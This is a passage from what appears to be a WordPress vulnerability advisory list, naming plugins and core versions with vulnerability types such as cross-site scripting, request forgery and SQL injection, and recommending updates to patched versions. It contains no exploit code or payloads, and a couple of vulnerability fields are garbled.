Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Responsive Poll

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Comment Fields [Modify/Disable/Remove]

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Semalt Blocker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nelio AB Testing

Vulnerability: Directory Traversal
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Donorbox – Free Recurring Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WPDBSpringClean

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.71
Recommended Action: Update to version 3.2.71, or a newer patched version

Plugin: Storefront Footer Text

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Missing Authorization via send_test_email
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: SQL Injection
Patched Version: 7.11.18
Recommended Action: Update to version 7.11.18, or a newer patched version

Plugin: Maileon for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: PHP Object Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_deactivate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Api2Cart Bridge Connector

Vulnerability: Arbitrary Code Execution
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: masterslider

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP eBay Product Feeds

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Re:amaze Helpdesk & Live Chat

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Easy Testimonial Slider and Form

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via search_term
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Arbitrary File Upload
Patched Version: 1.8.20
Recommended Action: Update to version 1.8.20, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.12.2
Recommended Action: Update to version 1.12.2, or a newer patched version

Plugin: WooCommerce Blocks

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 2.5.16
Recommended Action: Update to one of the following versions, or a newer patched version: 2.5.16, 2.6.2, 2.7.2, 2.8.1, 2.9.1, 3.0.1, 3.1.1, 3.2.1, 3.3.1, 3.4.1, 3.5.1, 3.6.1, 3.7.2, 3.8.1, 3.9.1, 4.0.1, 4.1.1, 4.2.1, 4.3.1, 4.4.3, 4.5.3, 4.6.1, 4.7.1, 4.8.1, 4.9.2, 5.0.1, 5.1.1, 5.2.1, 5.3.2, 5.4.1, 5.5.1

Plugin: Contact Form 7 Datepicker

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ImageMapper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Theme Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Githuber MD – WordPress Markdown Editor

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 1.16.3
Recommended Action: Update to version 1.16.3, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Directory Traversal
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Popup Like box – Page Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.41
Recommended Action: Update to version 2.2.41, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: PHP Object Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Tiny Contact Form

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.0.65
Recommended Action: Update to version 1.0.65, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: WooCommerce SagePay Direct Payment Gateway

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.6.7
Recommended Action: Update to version 0.1.6.7, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.3.15
Recommended Action: Update to version 6.3.15, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.12.7
Recommended Action: Update to version 3.12.7, or a newer patched version

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.2.52
Recommended Action: Update to version 1.2.52, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Private Messages For WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visual Portfolio, Photo Gallery & Post Grid

Vulnerability: Contributor+ CSS Injection
Patched Version: 2.19.0
Recommended Action: Update to version 2.19.0, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting via poll_id Parameter
Patched Version: 6.0.3
Recommended Action: Update to version 6.0.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.43
Recommended Action: Update to version 1.1.43, or a newer patched version

Plugin: AGIL(Automatic Grid Image Listing)

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Canto

Vulnerability: Unauthenticated Remote File Inclusion
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Sensitive Data Exposure
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: FULL – Cliente

Vulnerability: Customer <= 2.2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Survey And Quiz Tool

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: CPT Bootstrap Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unlimited Addons for WPBakery Page Builder

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Broken Link Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Plugin: Change Uploaded File Permissions

Vulnerability: Cross-Site Request Forgery to Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Audio Player with Playlist Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SEO Booster

Vulnerability: Admin+ SQL Injection
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Arbitrary Post Deletion and Plugin Settings Update via Cross-Site Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: LWS Affiliation

Vulnerability: Unauthenticated Remote/Local File Inclusion
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘replace_urls’
Patched Version: 3.12.2
Recommended Action: Update to version 3.12.2, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘loadRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Newsletter & Bulk Email Sender – Email Newsletter Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Citizen Space

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘tag’
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross-Site Request Forgery via _process_general
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Missing Authorization
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 6.6.3
Recommended Action: Update to version 6.6.3, or a newer patched version

Plugin: Forms for Mailchimp by Optin Cat – Grow Your MailChimp List

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: Quick Restaurant Reservations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Simple Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.1.3.2
Recommended Action: Update to version 1.1.3.2, or a newer patched version

Plugin: Easily Generate Rest API Url

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Bypass sanitize_file_name Protection
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Our Team Showcase

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘liveSearch’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Prayer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Instantio – WooCommerce Quick Checkout | Direct Checkout, Floating Cart, Side Cart & Popup Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Online Hotel Booking System Pro

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated CSV Injection
Patched Version: 5.5.3
Recommended Action: Update to version 5.5.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: TubePress

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP Mail SMTP Pro

Vulnerability: Missing Authorization to Information Disclosure via is_print_page
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Maintenance Switch

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: YML for Yandex Market

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.10.8
Recommended Action: Update to version 3.10.8, or a newer patched version

Plugin: Media Usage

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NewStatPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Sensitive Data Disclosure
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authorization Bypass
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: XML Sitemap Generator for Google

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Short URL

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: tarteaucitron.js – Cookies legislation & GDPR

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Static Page eXtended

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery leading to Post Thumbnail Change
Patched Version: 3.29
Recommended Action: Update to version 3.29, or a newer patched version

Plugin: Blackhole for Bad Bots

Vulnerability: Arbitrary IP Address Blocking via IP Spoofing
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: 3D Tag Cloud

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Good & Bad comments

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CMS Commander – Manage Multiple Sites

Vulnerability: PHP Object Injection
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: VR Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: WP Power Stats

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Scroll Baner

Vulnerability: Cross-Site Request Forgery to Remote Code Execution and/or Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Scripts n Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: YDS Support Ticket System

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_toolbar_save_settings_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Comment License

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Custom Post Carousels with Owl

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan

Vulnerability: Cross-Site Request Forgery via antihacker_ajax_scan
Patched Version: 4.35
Recommended Action: Update to version 4.35, or a newer patched version

Plugin: Easy Property Listings

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Product Vendors

Vulnerability: Insecure Direct Object Reference to Vendor Commission Percentage Update
Patched Version: 2.1.69
Recommended Action: Update to version 2.1.69, or a newer patched version

Plugin: WooCommerce Login Redirect

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Product Attachment for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Support Ticket System

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Duplicate Post

Vulnerability: Cross-Site Request Forgery via ‘cdp_action_handling’ AJAX action
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via wpFastestCachePage options, wpFastestCachePreload_number or wpFastestCacheLanguage parameter
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: WordPress IDX Real Estate Listings & MLS Search

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: External Media

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Typebot | Create advanced chat experiences without coding

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_set
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.21.2
Recommended Action: Update to version 4.21.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting in post_oxi_settings function
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Shortcode Factory

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Google Analytics Opt-Out

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: OneSignal – Web Push Notifications

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.17.8
Recommended Action: Update to version 1.17.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.3.3
Recommended Action: Update to version 6.3.3, or a newer patched version

Plugin: Mautic Integration for WooCommerce

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Options Update
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Modal Window – create popup modal window

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: Product Vendors

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.77
Recommended Action: Update to version 2.1.77, or a newer patched version

Plugin: Yampi Checkout

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: zingiri-web-shop

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Unauthenticated Parameter Manipulation
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Attachment Name
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: WDSocialWidgets

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wr Age Verification

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Anywhere Flash Embed

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Discord Invite

Vulnerability: Reflected Cross-Site Scripting via webhook
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: GEO my WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Augmented reality plugin

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.27.4
Recommended Action: Update to version 4.27.4, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Core: WordPress

Vulnerability: Authentication Cookie Forgery
Patched Version: 3.7.2
